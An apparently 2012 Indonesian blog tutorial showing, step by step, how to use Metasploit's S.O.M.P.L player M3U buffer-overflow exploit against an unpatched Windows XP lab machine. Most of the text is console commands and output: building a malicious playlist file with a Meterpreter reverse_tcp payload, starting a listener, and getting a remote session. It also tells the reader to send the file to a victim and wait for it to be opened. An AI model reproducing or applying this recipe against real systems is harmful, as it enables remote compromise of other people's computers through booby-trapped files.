Searching...
June 18, 2012

Metasploit VS SOMPL Player

Setelah sekian lama tidak kembali dalam dunia peretasan system, kali ini saya mencoba kembali menguji system keamanan yang dimiliki oleh SOMPL player yang saya jalankan pada Windows XP SP2 (Unpatched version).

Vulnerability ini saya dapatkan dari Exploit-DB. Kemudian di modifikasi oleh metasploit sehingga attacker dapat menggunakan payload yang beragam. Untuk mengujinya, pertama saya mendownload MP3 Player ini dari Softpedia. Kemudian menjalankan MP3 player ini di Windows XP SP2 English Version.

Tutorial Requirements:
1. metasploit 
2. SOMPL Player
3. Windows XP SP2
4. vmware


Conditions:
1. Attacker IP : 10.10.1.1
2. Target IP : 10.10.1.128




Jika semua persiapan sudah siap, maka anda bisa memulai tutorial ini.


Walkthrough:

1. Buat malicious file


Pada konsol metasploit, kita dapat mencari exploit, payload, nops, auxiliary, encoder, dan post yang kita inginkan. Perintah ini dapat dieksekusi dengan


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > search


Contoh, jika kita hendak mencari encoder shikata_ga_nai, maka kita masukan perintah:

Note: Tulisan yang dicetak merah, adalah output. Yang dicetak biru adalah input.


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > search shikata_ga_nai Matching Modules
================
Name                          Rank       Description
----                          ---------  -----------
encoder/x86/shikata_ga_nai    excellent  Polymorphic XOR Additive Feedback Encoder



Untuk mencari exploit yang akan kita gunakan, maka kita masukan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > search sompl
Matching Modules
================

   Name                                        Disclosure Date  Rank   Description
   ----                                        ---------------  ----   -----------
   exploit/windows/fileformat/somplplayer_m3u  2010-01-22       great  S.O.M.P.L 1.0 Player Buffer Overflow


Kemudian kita gunakan exploit ini untuk membuat malicious file, yang kemudian akan dikirimkan ke target.


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > use exploit/windows/fileformat/somplplayer_m3u
msf  exploit(somplplayer_m3u) >


Kemudian kita atur file ini dengan opsi yang disediakan.


1. PAYLOAD : Menentukan payload yang akan digunakan oleh attacker.
2. FILENAME : Nama malicious file yang akan dibuat


Note : Jika anda menggunakan PAYLOAD reverse, maka anda akan menggunakan opsi berikut:
1. LHOST : IP Attacker
2. LPORT : Attacker's port listener


Note : Jika anda menggunakan PAYLOAD bind, maka anda akan menggunakan opsi berikut:
1. RHOST: IP Target
2. LPORT : Target's port listener


Anda juga bisa menggunakan encoder dalam membuat file ini:
1. ENCODER

Atur setiap opsi dengan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf exploit(somplplayer_m3u) > set [OPTION] [VALUE]

Contoh, kali ini saya menggunakan


1. PAYLOAD: windows/meterpreter/reverse_tcp
2. FILENAME : red-dragon.m3u
3. LHOST : 10.10.1.1
4. LPORT: 4444


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(somplplayer_m3u) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(somplplayer_m3u) > set FILENAME red-dragon.m3u
FILENAME => red-dragon.m3u
msf  exploit(somplplayer_m3u) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf  exploit(somplplayer_m3u) > set LPORT 4444
LPORT => 4444
msf  exploit(somplplayer_m3u) >



Kemudian kita buat file dengan mengeksekusi perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(somplplayer_m3u) > exploit

[*] Creating 'red-dragon.m3u' file ...
[+] red-dragon.m3u stored at /root/.msf4/local/red-dragon.m3u




File kita telah di simpan di /root/.msf4/local/red-draon.m3u. File ini yang akan membuka akses attacker untuk mendapat sesi meterpreter.




2. Setup Exploit Multi Handler


Setelah file terbuat, maka langkah selanjutnya adalah mengatur exploit multi hander, dan menjalankan listener pada koneksi meterpreter yang terpicu. Untuk menggunakan multi hanlder, kita dapat menggunakan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf > use exploit/multi/handlermsf  exploit(handler) >

Kemudian kita atur opsi yang ada, SAMA seperti yang telah kita atur pada langkah pertama.


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf  exploit(handler) > set LPORT 4444
LPORT => 4444
msf  exploit(handler) >





Setelah semua telah diatur, kita jalankan exploit ini dengan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(handler) > exploit[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...




TIDAK akan ada sesi meterpreter yang muncul jika payload kita belum terpicu, untuk itu, kita kirimkan file ini kepada korban, dan menunggu sampai korban membuka file ini dengan SOMPL player.



3. RED-DRAGON is OWNING!


Setelah korban menjalankan file ini dengan SOMPL player, maka SOMPL player akan mengalami buffer overflow, dimana program menjadi tidak stabil dan tidak merespon perintah.




Dan kita mendapat sesi meterpreter pada konsol metasploit kita..


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(handler) > exploit

[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 10.10.1.128
[*] Meterpreter session 1 opened (10.10.1.1:4444 -> 10.10.1.128:1059) at 2012-06-18 11:35:10 +0700

meterpreter >







You are so....
0wn3d by red-dragon

0 comment:

Post a Comment

 
Back to top!